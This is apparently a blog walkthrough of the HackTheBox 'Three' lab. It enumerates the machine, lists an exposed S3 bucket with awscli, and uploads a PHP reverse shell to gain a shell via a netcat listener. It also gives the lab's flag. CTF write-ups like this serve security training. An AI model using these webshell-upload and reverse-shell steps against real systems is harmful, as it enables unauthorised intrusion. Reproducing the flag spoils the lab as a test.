HTB Labs — Tier 1 — “Three” Machine Walkthrough | By CyberAlp0

Solving “THREE” lab in the starting point phase of HackTheBox — Tier 1

The Machine covers some tasks that will give you a walkthrough into finally finding the flag and solving the machine. This blog will guide you towards solving the tasks one by one and give you little bit more information and hints regarding each question. These hints will widen your experience and sharpen your mind.

The Reason the lab is named by “THREE”, is that it covers the s3 Buckets of amazon AWS. s3 bucket is a short for “Simple Storage Service”. And, it is a public cloud storage resource available in Amazon Web Services (AWS) platform.

Remember, Learning a thing about everything is much more important than learning everything about one thing.

Step 1: Connecting to the Starting Point Labs Servers.

To attack the target machine, you have to be on the same network. You can read my Blog that will guide you step-by-step into connecting to the target machine.

Step 2: Spawning the Machine and Start Solving the Tasks.

Task 1: How Many TCP Ports are opened in the Machine?

Answer: Number of TCP Ports = 2 Ports

Walkthrough:

we can use the Nmap for finding how many TCP Ports are opened in this machine. by typing the following command.

nmap 10.129.253.225

Note that there are some flags you can add in order to make this scan more faster and efficient.

Explainshell is a wonderful Resource for explaining the Linux Command Line. You can use as well for gaining more information about the different flags of Nmap.

Task 2: What is the domain of the email address provided in the “Contact” section of the website?

Answer: thetoppers.htb

Walkthrough:

By visiting the contact page in the website. you will be able to see the email address “mail@thetoppers.htb”. Thus the domain of the email is “thetoppers.htb”

The Contact Page of the target.

Task 3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

Answer: /etc/hosts

sudo nano /etc/hosts

Walkthrough:

DNS Server is responsible for Domain Name Solving. which means, instead of typing the IP address of each website you wish to visit, you will just type the domain of the website, and the DNS will take the burden of translating the Domain into an IP to send your request to the target server successfully.

There are 2 types of DNS servers that can be configured inside your system. There is a Public DNS server and there is a Local DNS server. An example for the public DNS server is the Google DNS (8.8.8.8). sometimes, we can add a local DNS server, in case it helps us gain access to a specific website which domain is not registered in the public DNS servers.

The only path where we can find all the configuration files in your system is /etc. There are two paths related to the DNS Config files. The first is in this path /etc/resolv.conf and the other in this path /etc/hosts.

In case you wanted to know more or change the DNS servers (Public & Local), Just nano this file (/etc/resolv.conf). In case you wanted to register a specific IP into the local DNS server, Just nano this file (/etc/hosts).

Remember, You have to be Sudo in order to tamper and make changes into the files.

Once you finish adding the IP of the Domain you want to access using nano, Press Ctrl + X followed by Y to save your changes.

Resolving the IP address of the target machine to the domain of the machine thetoppers.htb in /etc/hosts

Task 4: Which sub-domain is discovered during further enumeration?

Answer: s3.thetoppers.htb

Walkthrough:

There is a difference between the domain and the subdomain. The domain is when you type (https://www.google.com). The domain here is just google. Subdomains are created to offer a service that is related and linked to the main domain which is google like this (https://mail.google.com). In this case mail is the subdomain under the domain Google.

You can add any number of other domains to the /etc/hosts to be reflected to the local IP of yours “In this scenario, The IP of the machine”.

You can define the sub-domains under the main domain (thetoppers)using lots of tools like wfuzz, ffuf, and gobuster.

In our case, we will be using the gobuster for enumerating the subdomains linked to the domain “thetoppers.htb”. There are lots of tool that we can use for subdomain enumeration like the ffuf and wfuzz.

Followed are the commands that you will be using for each one of the tools. Also, note that we will be trying to fuzz the subdomains using a subdomain list provided by seclists

1- Gobuster

gobuster vhost -u "http://thetoppers.htb -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt --append-domain

2- wfuzz

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt -u "http://thetoppers.htb" -H "Host: FUZZ.thetoppers.htb" --hw 1036 -t 5

3- ffuf

ffuf -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt -H "Host: FUZZ.thetoppers.htb" -u http://thetoppers.htb

Task 5: Which service is running on the discovered sub-domain?

Answer: amazon s3

Walkthrough:

Amazon Simple Storage Service (S3) is a storage services that offers data availably, security, and performance. Many customers of all sizes can use the Amazon S3 to store and protect data from lots of risks such as data leakage.

Read More: What is Amazon s3?

Task 6: Which command line utility can be used to interact with the service running on the discovered sub-domain?

Answer: awscli (short for: AWS Command Line Interface)

Walkthrough:

In the Previous task, we have learned that the running service on the subdomain is the amazon s3, which is mainly used for protecting and storing data against cyber threats. In order to interact with the service running on this subdomain (s3.thetoppers.htb), you may use the command awscli.

awscli

Read More: How to configure Amazon Command Line Interface?.

Task 7: Which command is used to set up the AWS CLI installation?

Answer: aws configure

sudo apt install awscli

Installing the awscli as it wasn’t found

We should have installed the awscli first before typing “aws configure” command. It is now being downloaded using the command “apt install awscli”. Just press “y” each time you are asked. Or, you could have typed the command “apt install awscli -y” for installing in a stealth mode.

After installing the awscli, type aws configure

aws configure

Configuring the awscli. You may configure the AWS ID, Secret Access Key, Region, and output form with anything

After configuring the AWS, we will be able to list all the buckets as follows in the next task.

Walkthrough:

The “aws configure” command is the fastest way to setup the AWS CLI installation.

For more information: Configuring AWS CLI.

Task 8: What is the command used by the above utility to list all of the S3 buckets?

Answer: aws s3 ls

Walkthrough:

The Amazon s3 (Simple Storage Service) Buckets are used to store files “AKA Objects”. In AWS Cloud, these objects varies in size from few bytes to terabytes. One of the main advantages of the s3 Buckets, is its scalability. as you can store unlimited amount of data in the s3 bucket.

Amazon s3 (Simple Storage Device) can be represented as a balloon. it stretches depending on how much air you fill in it. Amazon s3 gives is same scalable as this balloon, it scales to meet your storage needs. You can start storing few amount of data and the storage will increase as you store much more data.

I Recommend reading this blog for more information: AWS s3 Bucket.

In order to list all of the s3 Buckets of the Amazon S3 Service, you will be typing the following command along with the flag ( — endpoint=URL). According to this resource, this option will help you listing all of the s3 Buckets.

aws s3 ls --endpoint=http://s3.thetoppers.htb s3://thetoppers.htb

You will get the following response

Listing the s3 Buckets using — endpoint option in the “aws s3 ls” command

Note: you may face the following error while connecting to the s3 amazon servers.

Listing the s3 Buckets in the Amazon s3 Servers

Could not connect to the endpoint URL: "http://s3.thetoppers.htb/thetoppers.htb?list-type=2&prefix=&delimiter=%2F&encoding-type=url"

Connectivity Issue: Could not connect to the endpoint URL: {The URL you are trying to connect}.

Solution: In order to successfully connect to the AWS s3 Buckets servers, through s3.thetoppers.htb, You shall modify the /etc/hosts, in order to resolve the s3.thetoppers.htb to the IP address of the machine “THREE”

Adding the s3.thetoppers.htb to the /etc/hosts to be resolve the IP address into the domain and subdomain of of the machine.

Task 9: This server is configured to run files written in what web scripting language?

Answer: PHP

Task 10: Submitting The Root Flag of the Machine

Answer: a980d99281a28d638ac68b9bf9453c2b

Walkthrough:

Since the server is configured to read the files that is written in PHP, we will be trying to upload a PHP shell to the server through connecting to the AWS s3 buckets.

we will be using the webshells command in Kali Linux in order to copy this shell into the server.

Navigating to the webshells command. it is located in /usr/share.

Webshells is an executable file that is located in a subdirectory in the path /usr/share. There are many PHP webshells, We will only be using the “php-reverse-shell.php”. we will use the command nano in order to modify the IP address.

Follow the Following Steps:

Firstly: Get the IP provided to you when you are connected to HTB VPN, By typing ifconfig

The IP address assigned to kali once I am connected to VPN.

Secondly: Modify the /etc/hosts.

Replace the local IP address “127.0.0.1” with “10.10.14.63”

We will be replacing the Local IP address “127.0.0.1” with the IP address provided to us when connecting to the VPN of the machine. We will also be changing the Port number to “8888”

Press Ctrl + X followed by Y to save your changes

Now, you have configured the PHP shell. All you have to do is to upload this shell to the server.

Thirdly: Upload the PHP shell to the server

aws s3 --endpoint=http://s3.thetoppers.htb cp php-reverse-shell.php s3://thetoppers.htb

Uploading the PHP shell to the AWS s3 servers in order to reverse connect to the server using the PHP Shell

Note: To make sure that the PHP was successfully uploaded, Run the ls command

aws s3 ls --endpoint=http://s3.thetoppers.htb s3://thetoppers.htb

Making sure that the PHP shell script was uploaded successfully to the server.

Fourthly: Listening to the Connection coming from the PHP shell

We will run netcat in order to listen to all the incoming connections coming from the PHP reverse shell on the local IP address we have configured, and through the port 8888.

nc -lnvp 8888

Running the netcat to listen to all the incoming connections configured in the PHP shell we uploaded on the server.

Connection between the web shell and the attacker machine

Fifthly: Capturing the flag of the machine

Now, we have an opened shell inside the server, this allows us to control and execute commands on the server. By navigating the server, we will find that the flag.txt file in the path /var/www

Navigating the directories in order to find the flag.txt

The THREE Machine flag “a980d99281a28d638ac68b9bf9453c2b”